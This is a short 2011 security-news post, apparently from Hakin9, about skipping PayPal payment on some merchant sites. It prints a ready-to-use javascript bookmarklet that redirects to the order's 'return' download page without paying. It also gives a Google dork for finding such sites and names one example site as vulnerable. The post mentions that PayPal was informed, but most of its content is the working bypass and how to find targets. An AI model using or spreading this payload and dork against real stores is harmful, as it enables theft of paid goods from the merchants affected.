Critical Vulnerability in PayPal

One of our readers discovered that that some of websites having PayPal portal for payment are vulnerable and can be exploited using simple javascript. The javascript bypass the payment page and redirect to download page.

He have already informed the PayPal about this issue.

Javascript is given below.
javascript:top.location=document.getElementsByName('return')[0].value;javascript:void(0);

The infected websites can easily be searched by this google dork "this order button requires a javascript enabled browser"Example of Infected Website :
http://www.pleazz.com/craigs/Get_more_backlinks.htm

We  owe this discover to Farhan Ghumra, a  student of Computer Enginnering from Rajkot in India.
June 30, 2011
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013